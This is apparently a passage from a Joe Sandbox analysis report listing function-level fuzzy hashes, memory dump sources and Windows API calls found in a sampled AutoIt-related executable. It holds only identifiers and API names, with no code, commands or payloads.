                                                                                                                                                                                                                                                                                                          • Instruction ID: d9630b73188c9ff26fd81ddbc0ed3aac571660df36dc48ed4c2481079800ad36
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d3583662e6f7e144ee14d910da68979ea0603b7228fe14a50fd2d5f2b3179cb
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 553139366187C1CAE770DF15B444A5AB7A1FB887A4F508229EAA943B99CF7DD481CF00
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetOpenFileNameW.COMDLG32 ref: 00007FF68C47B0D8
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C435A50: GetFullPathNameW.KERNEL32(?,00007FF68C435A3D,?,00007FF68C434C50,?,?,?,00007FF68C43109E), ref: 00007FF68C435A7B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C434694: GetLongPathNameW.KERNEL32(?,00007FF68C434741,?,00007FF68C433C00,?,?,?,?,?,00007FF68C432BC1), ref: 00007FF68C4346B8
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                                                                                                                                                          • String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$au3
                                                                                                                                                                                                                                                                                                          • API String ID: 779396738-2360590182
                                                                                                                                                                                                                                                                                                          • Opcode ID: 16a998d4ffd8908b2b5846d7a7af52c857f6656f6899eb4e8e8eaa093dec734f
                                                                                                                                                                                                                                                                                                          • Instruction ID: 7681a09142ee1739a91e1ecabf3ce69e976bec70496e7411131e6bf3d64160b8
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 16a998d4ffd8908b2b5846d7a7af52c857f6656f6899eb4e8e8eaa093dec734f
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F312C72A08B82C9E710DF21E8445AD77A4FF89B88F584139DA8C87B59DF7CD595CB00
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                                                                                                                          • String ID: msctls_trackbar32
                                                                                                                                                                                                                                                                                                          • API String ID: 1025951953-1010561917
                                                                                                                                                                                                                                                                                                          • Opcode ID: 0ec90dd8264e47930b8add246dd2117d3f761b03aba2c3bb1ed4f7e4c6c127fa
                                                                                                                                                                                                                                                                                                          • Instruction ID: 1069b411177ca99421055d3ee571424b2bdc403b0c0777eb68167976566935ec
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ec90dd8264e47930b8add246dd2117d3f761b03aba2c3bb1ed4f7e4c6c127fa
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC311876A18681CBE760CF25E454B5AB7A1FB88B94F144239EB9883B55CF3CD885CF04
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                                                                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                                                                                          • API String ID: 2280078643-1018135373
                                                                                                                                                                                                                                                                                                          • Opcode ID: f6c1382f695be2b80eeb360de390ec25b85b68791ec0bc773e7ce0cc61abff03
                                                                                                                                                                                                                                                                                                          • Instruction ID: ed23487464da558586cdac8320871d2b8fce18cca4dc4ffbf2c3adb09146ba1a
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f6c1382f695be2b80eeb360de390ec25b85b68791ec0bc773e7ce0cc61abff03
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02211C76A08641C7E730DB12E0402AE7760FB94B68F004629DE9D47BD5CF3DE886CB00
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                          • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                                                                                                                                                                          • API String ID: 2574300362-192647395
                                                                                                                                                                                                                                                                                                          • Opcode ID: b441bd5978eb2b7f425b1bf27e1c65cb3c7479a7c4568158e328b2615627030f
                                                                                                                                                                                                                                                                                                          • Instruction ID: 23aa3827e5a6492c799a88fcc4d5f4e70b2f704aa76c457a91d68e2c4b0b8de4
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b441bd5978eb2b7f425b1bf27e1c65cb3c7479a7c4568158e328b2615627030f
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70E0C265A06B0AC2EB14CB60A45436823A4BF48B68F850438D91D96394EFBCE6E9C340
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                                                          • API String ID: 2574300362-3689287502
                                                                                                                                                                                                                                                                                                          • Opcode ID: 849496fe8f7c3fa53244a860dec0166c597485a1e7ca8ffba036c0d989768c29
                                                                                                                                                                                                                                                                                                          • Instruction ID: 6a41e4f47a06a1ba5d83d4824aab679f960d2bc8983af7543120f9b09a75fb5f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 849496fe8f7c3fa53244a860dec0166c597485a1e7ca8ffba036c0d989768c29
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2DE0E565A06B0AC2EF14CB61E41436823E0FF58B6CF540438D95D86398EFBCE6E5C740
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                                                          • API String ID: 2574300362-1355242751
                                                                                                                                                                                                                                                                                                          • Opcode ID: 935ee8e5b0afee5f2a3e8b61c9fff60d84134b50b40d875a31bd5a84aed26f6b
                                                                                                                                                                                                                                                                                                          • Instruction ID: 696d4d78ec77ca6a202dfab344270901f690cf0bc16607d70e4e78c8392e3faf
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 935ee8e5b0afee5f2a3e8b61c9fff60d84134b50b40d875a31bd5a84aed26f6b
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DFE0E566A06B06C2EF14CB60E41437823A0FF48B6CF940539C95D86394EFBCE6E5C340
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                          • Opcode ID: 8ea6f4ac70786459caae908e23c7b1e170f2c83987f10f6455c2ac2cf614949c
                                                                                                                                                                                                                                                                                                          • Instruction ID: 7e31c2fd049b86221943faebaa3fc880194df4a5c85a08bc5a2b30119cc87452
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ea6f4ac70786459caae908e23c7b1e170f2c83987f10f6455c2ac2cf614949c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C0D1F876B04A65C6EB14CF66C9502AD37B1FB88F88B114426DF4E87B68DF39D888C744
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
• Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                          • Opcode ID: fc57336e55be4d4a0414789caafff31700b7c62f52e3843f0ecb10163a0943b0
                                                                                                                                                                                                                                                                                                          • Instruction ID: 3cc2ee56ec0a4b710ed6729019ea22933953de142820c80fd16811e696b4f83d
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fc57336e55be4d4a0414789caafff31700b7c62f52e3843f0ecb10163a0943b0
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6CD10466B05A41DAEB10DF65D4801AC33B5FF94B8CB40443ADE0D97BAADF38E569C380
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(?,?,00007FF68C43475D,?,?,?,00007FF68C438FCF,?,?,?,?,?,?,?,00007FF68C439D60), ref: 00007FF68C439F34
                                                                                                                                                                                                                                                                                                          • SetFilePointerEx.KERNEL32(?,?,00007FF68C43475D,?,?,?,00007FF68C438FCF,?,?,?,?,?,?,?,00007FF68C439D60), ref: 00007FF68C47D886
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
• Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: File$PointerRead
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3154509469-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 3201254c23c442e17564adbb3e46d8ade15d1a5368ec0c22c80302ae78d27f32
                                                                                                                                                                                                                                                                                                          • Instruction ID: fc7d7781233654fb06eddc33a35cebefae4e981bce12c2c349270c986a5b1f5b
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3201254c23c442e17564adbb3e46d8ade15d1a5368ec0c22c80302ae78d27f32
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CDB1AA72A08A46C6EB21CB25E454639B3A0FF94B98F118639DA9E837D4DF3DE4C1D700
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
• Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1352109105-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: bf09fe5937f6b34ddc429ee35f9a2399ceb717e99e565ce14bad0b4b6f8036fa
                                                                                                                                                                                                                                                                                                          • Instruction ID: cb0d0ebf5794c47f1b77e4908fcee8a4f881714cdde7c8b1e02ca0636e5e29dd
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf09fe5937f6b34ddc429ee35f9a2399ceb717e99e565ce14bad0b4b6f8036fa
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B412C32A05A46C5EB209F19E85457967A0FF88B98F55413AEA5D836A0DF38E4C5C301
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
• Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3076010158-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
• Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 4141327611-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: LongWindow$InvalidateMessageRectSend
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3340791633-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF68C46A02B,?,?,?,00007FF68C469FE6), ref: 00007FF68C473C41
                                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF68C46A02B,?,?,?,00007FF68C469FE6), ref: 00007FF68C473CA3
                                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF68C46A02B,?,?,?,00007FF68C469FE6), ref: 00007FF68C473CDD
                                                                                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF68C46A02B,?,?,?,00007FF68C469FE6), ref: 00007FF68C473D07
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1557788787-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C432794: GetWindowLongPtrW.USER32(?,?,00000000,00007FF68C47A57D), ref: 00007FF68C4327B1
                                                                                                                                                                                                                                                                                                          • GetCursorPos.USER32 ref: 00007FF68C4E1861
                                                                                                                                                                                                                                                                                                          • TrackPopupMenuEx.USER32 ref: 00007FF68C4E1885
                                                                                                                                                                                                                                                                                                          • GetCursorPos.USER32(?,?,00000000,?,?,00007FF68C47A35D,?,?,?,?,?,?,?,?,?,00007FF68C4324CF), ref: 00007FF68C4E18CC
                                                                                                                                                                                                                                                                                                          • DefDlgProcW.USER32(?,?,00000000,?,?,00007FF68C47A35D,?,?,?,?,?,?,?,?,?,00007FF68C4324CF), ref: 00007FF68C4E1910
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2864067406-0
                                                                                                                                                                                                                                                                                                          APIs
Memory Dump Source
• Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
• Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _ctrlfp
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ErrorLast$abort
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1447195878-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 13e5a053fdc59afbd3f437ffbd72ce3def34733e32cc643bca8322f3948ba88d
                                                                                                                                                                                                                                                                                                          • Instruction ID: fae14bc59991e84b89a5eed5e319f4df63b17bfd23c85590dbc3122c9894a620
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 13e5a053fdc59afbd3f437ffbd72ce3def34733e32cc643bca8322f3948ba88d
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA012920B09B46C2FE59A735956993D21917F447A8F55843CEA1EC37DEDD2CA888D301
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
